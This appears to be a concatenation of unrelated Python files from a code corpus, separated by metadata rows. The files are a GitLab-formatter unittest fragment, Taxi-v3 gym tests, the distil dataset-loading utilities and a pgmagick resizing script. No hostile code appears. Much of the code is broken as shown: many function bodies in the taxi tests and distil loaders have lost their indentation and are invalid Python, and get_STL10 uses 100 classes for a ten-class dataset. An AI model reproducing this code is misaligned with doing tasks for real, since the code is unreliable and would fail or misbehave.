    def assert_stdout_1(self, n, expected_output, mock_stdout):
        """Run _converter() and assert *expected_output* was printed.

        ``n`` is an unused placeholder (callers pass '').
        """
        # Only the printed output matters; the return value was previously
        # bound to an unused local.
        self.gitlab_format._converter()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_2(self, n, expected_output, mock_stdout):
        """Run write_json() and assert *expected_output* was printed."""
        self.gitlab_format.write_json()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_3(self, n, expected_output, mock_stdout):
        """Run write() and assert *expected_output* was printed."""
        self.gitlab_format.write()
        self.assertIn(expected_output, mock_stdout.getvalue())

    def test_convert(self):
        result = self.gitlab_format._converter()
        self.assertIs(result, None)
        self.assertIn('provider', self.gitlab_format._dict_repo_template())

    def test_output(self):
        self.assert_stdout_1('', 'Provider')

    def test_write_markdown(self):
        self.assert_stdout_2('', 'Done')

    def test_write(self):
        self.assert_stdout_3('', 'created')
| 35.037267 | 114 | 0.672221 | 674 | 5,641 | 5.360534 | 0.097923 | 0.079712 | 0.119568 | 0.159424 | 0.937725 | 0.937725 | 0.937725 | 0.937725 | 0.937725 | 0.937725 | 0 | 0.005693 | 0.190392 | 5,641 | 160 | 115 | 35.25625 | 0.785417 | 0.021096 | 0 | 0.825688 | 0 | 0 | 0.085523 | 0 | 0 | 0 | 0 | 0 | 0.40367 | 1 | 0.293578 | false | 0 | 0.045872 | 0 | 0.376147 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
af3cc132f7a0327d8578f8031ae3351fdc7a5b69 | 1,613 | py | Python | PI/Entrega3/test_taxiDriver.py | VergaraC/agents | c8ebeba018a6fbe85cd7ed616ef0ca6c6420fe42 | [
"MIT"
] | null | null | null | PI/Entrega3/test_taxiDriver.py | VergaraC/agents | c8ebeba018a6fbe85cd7ed616ef0ca6c6420fe42 | [
"MIT"
] | null | null | null | PI/Entrega3/test_taxiDriver.py | VergaraC/agents | c8ebeba018a6fbe85cd7ed616ef0ca6c6420fe42 | [
"MIT"
] | null | null | null | from adaptador import MeuTaxi
from datetime import datetime
import gym
env = gym.make("Taxi-v3").env
def _assert_taxi_case(taxi_row, taxi_col, passenger, destination):
    """Solve one Taxi-v3 configuration with MeuTaxi and check the final action.

    Encodes the given (taxi_row, taxi_col, passenger_location, destination)
    state — argument order per gym's Taxi-v3 ``encode`` — runs the MeuTaxi
    solver on the decoded state, prints the wall-clock solve time, and
    asserts that the last action of the returned path is 5 (drop-off).
    """
    # The reset state itself is unused (the original bound it to a variable
    # that was immediately overwritten); we encode our own state below.
    env.reset()
    state = env.encode(taxi_row, taxi_col, passenger, destination)
    env.render()
    inicio = datetime.now()
    result = MeuTaxi(env.desc, env.decode(state))
    fim = datetime.now()
    print(fim - inicio)  # solver wall-clock time for this case
    assert result.path()[-1] == 5


def test_1():
    _assert_taxi_case(3, 2, 1, 0)


def test_2():
    _assert_taxi_case(3, 1, 2, 0)


def test_3():
    _assert_taxi_case(3, 1, 3, 0)


def test_4():
    _assert_taxi_case(3, 3, 0, 1)


def test_5():
    _assert_taxi_case(3, 1, 1, 2)
# Case: taxi at (row 3, col 1), passenger location 3, destination 3 —
# encode() argument order per gym's Taxi-v3. Expects MeuTaxi's solution
# path to end in action 5 (drop-off).
def test_6():
# NOTE(review): the reset state is immediately overwritten by encode() below.
state = env.reset()
state = env.encode(3, 1, 3, 3)
env.render()
inicio = datetime.now()
result = MeuTaxi(env.desc, env.decode(state))
fim = datetime.now()
# Wall-clock time MeuTaxi took to solve this instance.
print(fim - inicio)
assert result.path()[-1]==5 | 24.815385 | 49 | 0.592684 | 232 | 1,613 | 4.094828 | 0.137931 | 0.101053 | 0.082105 | 0.113684 | 0.892632 | 0.892632 | 0.892632 | 0.833684 | 0.772632 | 0.709474 | 0 | 0.035016 | 0.238686 | 1,613 | 65 | 50 | 24.815385 | 0.738599 | 0 | 0 | 0.724138 | 0 | 0 | 0.004337 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0.103448 | false | 0 | 0.051724 | 0 | 0.155172 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
af653687d25212ec720bbbf2a2c2ca6901785f11 | 27,072 | py | Python | distil/utils/dataset.py | SatyadevNtv/distil | c8c3489920a24537a849eb8446efc9c2e19ab193 | [
"MIT"
] | 1 | 2021-08-15T07:50:46.000Z | 2021-08-15T07:50:46.000Z | distil/utils/dataset.py | chipsh/distil | c8c3489920a24537a849eb8446efc9c2e19ab193 | [
"MIT"
] | null | null | null | distil/utils/dataset.py | chipsh/distil | c8c3489920a24537a849eb8446efc9c2e19ab193 | [
"MIT"
] | null | null | null | import math
import numpy as np
import torch
from torchvision import datasets
from torchvision import transforms
from PIL import Image
def add_label_noise(y_trn, num_cls, noise_ratio=0.8):
    """Randomly corrupt a fraction of the labels in *y_trn*, in place.

    A subset of positions (``noise_ratio`` of the array, chosen without
    replacement) is overwritten with classes drawn uniformly from
    ``range(num_cls)``. Functionality adapted from CORDS.

    Parameters
    ----------
    y_trn : numpy ndarray
        Labels to corrupt; modified in place.
    num_cls : int
        Number of possible classes.
    noise_ratio : float, optional
        Fraction of labels to overwrite. The default is 0.8.

    Returns
    -------
    numpy ndarray
        The same ``y_trn`` array, now containing noisy labels.
    """
    n_labels = len(y_trn)
    n_noisy = int(n_labels * noise_ratio)
    positions = np.random.choice(np.arange(n_labels), size=n_noisy, replace=False)
    new_labels = np.random.choice(np.arange(num_cls), size=n_noisy, replace=True)
    y_trn[positions] = new_labels
    return y_trn
def get_imbalanced_idx(y_trn, num_cls, class_ratio=0.6):
    """Pick indices forming a class-imbalanced subset of the supplied labels.

    A random ``class_ratio`` fraction of the classes is down-sampled to 10%
    of the smallest class's size; every other class keeps all of its
    samples. Functionality adapted from CORDS.

    Parameters
    ----------
    y_trn : numpy ndarray
        Labels of the full dataset.
    num_cls : int
        Number of possible classes.
    class_ratio : float, optional
        Fraction of classes to down-sample. The default is 0.6.

    Returns
    -------
    list
        Indices into the dataset that realise the class imbalance.
    """
    # Convert once up front; the original re-built torch.Tensor(y_trn) on
    # every loop iteration below.
    labels = torch.Tensor(y_trn)

    # Size of the smallest class; down-sampled classes keep 10% of it.
    samples_per_class = torch.zeros(num_cls)
    for cls in range(num_cls):
        samples_per_class[cls] = len(torch.where(labels == cls)[0])
    min_samples = int(torch.min(samples_per_class) * 0.1)

    # Classes that will be down-sampled, chosen by the specified ratio.
    selected_classes = np.random.choice(np.arange(num_cls),
                                        size=int(class_ratio * num_cls),
                                        replace=False)

    # The original duplicated the whole branch for i == 0 just to initialise
    # the list; a single accumulator with extend() is equivalent.
    subset_idxs = []
    for cls in range(num_cls):
        cls_idxs = torch.where(labels == cls)[0].cpu().numpy()
        if cls in selected_classes:
            subset_idxs.extend(np.random.choice(cls_idxs, size=min_samples, replace=False))
        else:
            subset_idxs.extend(cls_idxs)
    return subset_idxs
def make_data_redundant(X, Y, intial_bud, unique_points=5000, amtRed=2):
    """Overwrite part of the pool so only ~X.shape[0]/amtRed rows are unique.

    Rows before ``intial_bud + unique_points`` are left untouched. Within the
    remainder, each class keeps ``ceil(count / amtRed)`` distinct rows and
    every other row of that class is overwritten with a copy of one of them.

    Parameters
    ----------
    X : numpy ndarray
        Feature matrix; modified in place.
    Y : numpy ndarray
        Labels aligned with ``X``.
    intial_bud : int
        Number of initial points assumed to be labelled.
    unique_points : int, optional
        Number of points kept unique in the unlabelled pool (default 5000).
    amtRed : float, optional
        Factor that determines redundancy. The default is 2.

    Returns
    -------
    numpy ndarray
        The modified ``X``.
    """
    protected = intial_bud + unique_points
    classes, counts = np.unique(Y[protected:], return_counts=True)
    for cls, count in zip(classes, counts):
        keep = math.ceil(count / amtRed)
        cls_idxs = np.where(Y[protected:] == cls)[0] + protected
        # Tile the retained indices until they cover the whole class, then
        # copy those rows over every row of the class (equivalent to the
        # original's repeated-concatenate loop).
        sources = np.tile(cls_idxs[:keep], math.ceil(amtRed))[:count]
        X[cls_idxs] = X[sources]
    return X
def make_aug_data_redundant(X,Y,intial_bud,unique_points= 5000,amtRed=2):
"""
Modifies the input dataset in such a way that only X.shape(0)/amtRed are original
points and the rest are augmented versions of the originals.
Parameters
----------
X : numpy ndarray
The feature set to be made redundant.
Y : numpy ndarray
The label set corresponding to the X.
intial_bud : int
Number of initial points that are assumed to be labelled.
unique_points: int
Number of points to be kept unique in the unlabelled pool.
amtRed : float, optional
Factor that determines redundancy. The default is 2.
Returns
-------
X : numpy ndarray
Modified feature set.
"""
# Rows before this index are left untouched.
unique_ind = intial_bud + unique_points
classes,no_elements = np.unique(Y[unique_ind:], return_counts=True)
# NOTE(review): X.shape[1] is used as the crop size — assumes square images
# stored as (N, H, W[, C]) with H == W; confirm against callers.
crop_transform = transforms.RandomCrop(X.shape[1], padding=5)
trans_transform = transforms.RandomAffine(degrees=0, translate=(0.5, 0.5))
for cl in range(len(classes)):
# Number of rows of this class kept as originals; the rest are replaced
# with randomly augmented copies of those originals.
retain = math.ceil(no_elements[cl]/amtRed)
idxs = np.where(Y[unique_ind:] == classes[cl])[0]
idxs += unique_ind
for i in range(1,math.ceil(amtRed)):
for j in range(retain):
# Stop once the class's index list is exhausted.
if len(idxs) <= i*retain+j:
break
img = Image.fromarray(X[idxs[j]])
# Alternate between a random crop and a random translation so the
# redundant copies are not all augmented the same way.
if j%2 == 0:
img = crop_transform(img)
else:
img = trans_transform(img)
X[idxs[i*retain+j]] = np.asarray(img)
#X[idxs] = X[idxs_rep[:no_elements[cl]]]
return X
def get_dataset(name, path, tr_load_args=None, te_load_args=None):
    """Load one of the supported datasets by name.

    Parameters
    ----------
    name: str
        One of 'MNIST', 'KMNIST', 'FASHION_MNIST', 'CIFAR10', 'CIFAR100',
        'SVHN', 'STL10'.
    path: str
        Path to save the downloaded dataset.
    tr_load_args: dict, optional
        Distribution-shift options for the train split
        ('class_imbalance_ratio' or 'noisy_labels_ratio').
    te_load_args: dict, optional
        Distribution-shift options for the test split.

    Returns
    -------
    X_tr, Y_tr, X_te, Y_te
        Train features (numpy array), train labels (torch tensor), test
        features (numpy array), test labels (torch tensor).

    Raises
    ------
    ValueError
        If ``name`` is not a supported dataset. (Previously the function
        silently returned None, which only failed later at the caller.)
    """
    if name == 'MNIST':
        return get_MNIST(path, tr_load_args, te_load_args)
    elif name == 'KMNIST':
        return get_KMNIST(path, tr_load_args, te_load_args)
    elif name == 'FASHION_MNIST':
        return get_FASHION_MNIST(path, tr_load_args, te_load_args)
    elif name == 'CIFAR10':
        return get_CIFAR10(path, tr_load_args, te_load_args)
    elif name == 'CIFAR100':
        return get_CIFAR100(path, tr_load_args, te_load_args)
    elif name == 'SVHN':
        return get_SVHN(path, tr_load_args, te_load_args)
    elif name == 'STL10':
        return get_STL10(path, tr_load_args, te_load_args)
    else:
        raise ValueError("Unsupported dataset name: {}".format(name))
def get_SVHN(path, tr_load_args = None, te_load_args = None):
"""
Downloads SVHN dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the SVHN dataset
data_tr = datasets.SVHN(path + '/SVHN', split="train", download=True)
data_te = datasets.SVHN(path + '/SVHN', split="test", download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.labels
X_te = data_te.data
Y_te = data_te.labels
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_MNIST(path, tr_load_args = None, te_load_args = None):
"""
Downloads MNIST dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the MNIST dataset
data_tr = datasets.MNIST(path + '/MNIST', train=True, download=True)
data_te = datasets.MNIST(path + '/MNIST', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data.numpy()
Y_tr = data_tr.targets.numpy()
X_te = data_te.data.numpy()
Y_te = data_te.targets.numpy()
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_KMNIST(path, tr_load_args = None, te_load_args = None):
"""
Downloads KMNIST dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the KMNIST dataset
data_tr = datasets.KMNIST(path + '/KMNIST', train=True, download=True)
data_te = datasets.KMNIST(path + '/KMNIST', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data.numpy()
Y_tr = data_tr.targets.numpy()
X_te = data_te.data.numpy()
Y_te = data_te.targets.numpy()
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_FASHION_MNIST(path, tr_load_args = None, te_load_args = None):
"""
Downloads FASHION_MNIST dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the FASHION_MNIST dataset
data_tr = datasets.FashionMNIST(path + '/FASHION_MNIST', train=True, download=True)
data_te = datasets.FashionMNIST(path + '/FASHION_MNIST', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data.numpy()
Y_tr = data_tr.targets.numpy()
X_te = data_te.data.numpy()
Y_te = data_te.targets.numpy()
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_CIFAR10(path, tr_load_args = None, te_load_args = None):
"""
Downloads CIFAR10 dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 10
# Download the CIFAR10 dataset
data_tr = datasets.CIFAR10(path + '/CIFAR10', train=True, download=True)
data_te = datasets.CIFAR10(path + '/CIFAR10', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.targets
X_te = data_te.data
Y_te = data_te.targets
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_CIFAR100(path, tr_load_args = None, te_load_args = None):
"""
Downloads CIFAR100 dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 100
# Download the CIFAR100 dataset
data_tr = datasets.CIFAR100(path + '/CIFAR100', train=True, download=True)
data_te = datasets.CIFAR100(path + '/CIFAR100', train=False, download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.targets
X_te = data_te.data
Y_te = data_te.targets
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te
def get_STL10(path, tr_load_args = None, te_load_args = None):
"""
Downloads STL10 dataset
Parameters
----------
path: str
Path to save the downloaded dataset
Returns
----------
X_tr: numpy array
Train set
Y_tr: torch tensor
Training Labels
X_te: numpy array
Test Set
Y_te: torch tensor
Test labels
"""
# Deterministic random seed to ensure data initialization is consistent
np.random.seed(42)
num_cls = 100
# Download the STL10 dataset
data_tr = datasets.STL10(path + '/STL10', split="train", download=True)
data_te = datasets.STL10(path + '/STL10', split="test", download=True)
# Obtain the raw data
X_tr = data_tr.data
Y_tr = data_tr.labels
X_te = data_te.data
Y_te = data_te.labels
# Initialize tr_idx and te_idx, which contain the full list of indices.
# Used to select a subset from the the full dataset.
tr_idx = [x for x in range(X_tr.shape[0])]
te_idx = [x for x in range(X_te.shape[0])]
# Prepare labels for subset selection
Y_tr = np.array(Y_tr)
Y_te = np.array(Y_te)
# If the load arguments specify a class imbalance or a noise ratio, apply the distribution
# shift to the appropriate dataset. Note that only one of class imbalance or noise is applied.
if tr_load_args is not None:
if "class_imbalance_ratio" in tr_load_args:
tr_idx = get_imbalanced_idx(Y_tr, num_cls, tr_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in tr_load_args:
Y_tr = add_label_noise(Y_tr, num_cls, tr_load_args["noisy_labels_ratio"])
if te_load_args is not None:
if "class_imbalance_ratio" in te_load_args:
te_idx = get_imbalanced_idx(Y_te, num_cls, te_load_args["class_imbalance_ratio"])
elif "noisy_labels_ratio" in te_load_args:
Y_te = add_label_noise(Y_te, num_cls, te_load_args["noisy_labels_ratio"])
# Select the subset specified by tr_idx and te_idx
X_tr = X_tr[tr_idx]
Y_tr = Y_tr[tr_idx]
X_te = X_te[te_idx]
Y_te = Y_te[te_idx]
# Shuffle train and test datasets.
train_permutation = np.random.choice(np.arange(len(Y_tr)), size=len(Y_tr), replace=False)
test_permutation = np.random.choice(np.arange(len(Y_te)), size=len(Y_te), replace=False)
X_tr = X_tr[train_permutation]
Y_tr = Y_tr[train_permutation]
X_te = X_te[test_permutation]
Y_te = Y_te[test_permutation]
# Convert labels to tensor
Y_tr = torch.from_numpy(Y_tr)
Y_te = torch.from_numpy(Y_te)
return X_tr, Y_tr, X_te, Y_te | 34.138714 | 108 | 0.630799 | 4,077 | 27,072 | 3.929605 | 0.058131 | 0.02116 | 0.031833 | 0.016978 | 0.891642 | 0.871356 | 0.850946 | 0.834218 | 0.821235 | 0.811248 | 0 | 0.007871 | 0.281952 | 27,072 | 793 | 109 | 34.138714 | 0.816297 | 0.320294 | 0 | 0.777448 | 0 | 0 | 0.07634 | 0.0354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035608 | false | 0 | 0.017804 | 0 | 0.106825 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bbc5b39c1b46ef10ebe396b7a3b4aa45fe6dee0c | 675 | py | Python | example/pgmagick_prof.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 136 | 2015-07-15T12:49:36.000Z | 2022-03-24T12:30:25.000Z | example/pgmagick_prof.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 59 | 2015-12-28T21:40:37.000Z | 2022-03-31T13:11:50.000Z | example/pgmagick_prof.py | veryhappythings/pgmagick | 5dce5fa4681400b4c059431ad69233e6a3e5799a | [
"MIT"
] | 33 | 2015-12-04T08:00:07.000Z | 2022-01-28T23:39:25.000Z | import sys
from pgmagick import Image, FilterTypes as ft
# same
# convert SRC.jpg -filter Sinc -resize 500x500 -sharpen 1 -quality 100 DST.jpg
# gm convert SRC.jpg -filter Sinc -resize 500x500 -sharpen 1 -quality 100 DST.jpg
im = Image('./X.jpg')
im.quality(100)
im.sharpen(1.0)
im.write('./Y.jpg')
im = Image('./X.jpg')
im.quality(100)
im.filterType(ft.SincFilter)
im.scale('1000x1000')
im.sharpen(1.0)
im.write('./Y.jpg')
im = Image('./X.jpg')
im.quality(100)
im.filterType(ft.SincFilter)
im.scale('100x100')
im.sharpen(1.0)
im.write('./Y.jpg')
im = Image('./X.jpg')
im.quality(100)
im.filterType(ft.SincFilter)
im.scale('500x500')
im.sharpen(1.0)
im.write('./Y.jpg')
